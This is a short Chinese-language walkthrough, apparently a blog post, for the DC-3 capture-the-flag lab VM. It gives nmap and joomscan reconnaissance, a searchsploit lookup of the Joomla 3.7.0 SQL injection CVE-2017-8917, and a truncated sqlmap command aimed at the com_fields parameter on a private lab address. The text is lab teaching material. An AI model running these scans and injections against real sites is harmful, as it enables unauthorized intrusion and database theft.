DC-3 DC-3 | Five86 | DC Challenges (靶机下载地址)
环境:DC-3靶机地址:192.168.1.152
kali地址:192.168.1.176
都是桥接模式
1 .收集信息
nmap -sP 192.168.1.0/24 nmap -A 192.168.1.152 #发现joomla内容管理系统 访问 192.168.1.152 #发现
提示只有一个入口,让我们提权为root用户
知道网站用的是joomla cms,那我们就可以使用joomscan扫描工具扫描Joomla相关配置内容、已知漏洞等:
2 .漏洞发现
joomscan --url http://192.168.1.152 #通过kali自带的 joomscan 获取详细信息
searchsploit工具查找Joomla 3.7.0版本存在 sql注入漏洞 (CVE-2017-8917),
searchsploit Joomla 3.7.0
将sql注入漏洞相关介绍文档保存到本地,并查看相关注入方法
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt jommla-370-sqli.txt #下载 cat Joomla-370-sqli.txt #查看
3. 漏洞利用
使用sqlmap自动注入工具对靶机执行sql注入代码
注入查询数据库有哪些,查出5个数据库信息
sqlmap -u "http://192.168.1.152/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"